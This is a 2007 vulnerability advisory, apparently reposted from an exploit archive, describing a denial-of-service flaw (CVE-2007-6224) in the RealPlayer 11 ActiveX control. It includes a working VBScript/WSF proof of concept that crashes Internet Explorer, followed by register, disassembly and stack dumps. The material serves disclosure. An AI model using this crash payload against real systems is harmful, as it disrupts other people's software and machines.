DOS in Realplayer 11 ActiveX on Win Vista and Win XP SP2

2007.12.04
Credit: Adonis, Abed
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2007-6224
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

+-----------------------------------------------------------------. Affected : Realplayer 11 ActiveX on Win Vista and Win XP SP2 : Type : DOS Attack : Date : 28-11-2007 : Author : Adonis, Abed : Link : http://www.safehack.com/Advisory/realpdos.txt : +-----------------------------------------------------------------. : +-------------. : Brief History \ : +---------------`-------------------------------------------------. GetSourceTransport() fails to handle exceptional conditions, which: leads to a DoS (Denial of Service) attack. : : GetSourceTransport() is found in rmoc3260.dll which is installed : with RealPlayer 11. : : Note: This ActiveX can be loaded by IE or any other browser. : : Successful exploitation will lead to a remote crash in IE 6/7. : : +-----------. : The Problem \ : +-------------`---------------------------------------------------. RealPlayer 11 ActiveX DoS Proof-of-Concept : : : -:PoC:- : 1- Copy and past the following code into filepoc.wsf : 2- Run it by double clicking on it : ---------------------------------------------------snip-----------: <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' /> <script language='vbscript'> targetFile = "C:\Windows\system32\rmoc3260.dll" prototype = "Function GetSourceTransport ( ByVal nSourceNum As Integer ) As String" memberName = "GetSourceTransport" progid = "RealAudioObjects.RealAudio" argCount = 1 arg1=32767 target.GetSourceTransport arg1 </script></job></package> ---------------------------------------------------snip-----------: Registers: -------------------------------------------------- EIP 637F4A02 -> 00000000 EAX 0022EC44 -> 00000000 EBX 663CCB38 -> 663B7400 -> Uni: t;ft;f ECX 0022EC44 -> 00000000 EDX 01536388 -> 638416B8 EDI 00000000 ESI 00000000 EBP 0022EC68 -> 0022EC78 ESP 0022EC3C -> 00000000 Block Disassembly: -------------------------------------------------- 637F49F2 JE SHORT 637F49F8 637F49F4 MOV ESI,EAX 637F49F6 JMP SHORT 637F49FA 637F49F8 XOR ESI,ESI 637F49FA LEA ECX,[EBP-24] 637F49FD CALL 6381C1F0 637F4A02 MOV EDX,[ESI] <--- CRASH 637F4A04 LEA EAX,[EBP-4] 637F4A07 PUSH EAX 637F4A08 PUSH 638427D8 637F4A0D PUSH ESI 637F4A0E CALL [EDX] 637F4A10 MOV EAX,[EBP+8] 637F4A13 SUB EAX,46 637F4A16 JE 637F4B28 Stack Dump: -------------------------------------------------- 22EC3C 00 00 00 00 F4 EC 22 00 00 00 00 00 F4 EC 22 07 [................] 22EC4C C0 6D 53 01 00 00 00 00 30 ED 22 00 00 00 00 00 [.mS.............] 22EC5C 00 00 00 00 DC 9A 2B 00 00 00 00 00 78 EC 22 00 [................] 22EC6C A8 C7 7F 63 47 00 00 00 FF 7F 00 00 90 EC 22 00 [...cG...........] 22EC7C 8E 48 3B 66 88 63 53 01 47 00 00 00 FF 7F 00 00 [.H.f.cS.G.......] : : Peace to you all:all and Happy New Year full of health and Peace : +-----------------------------------------------------------------.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top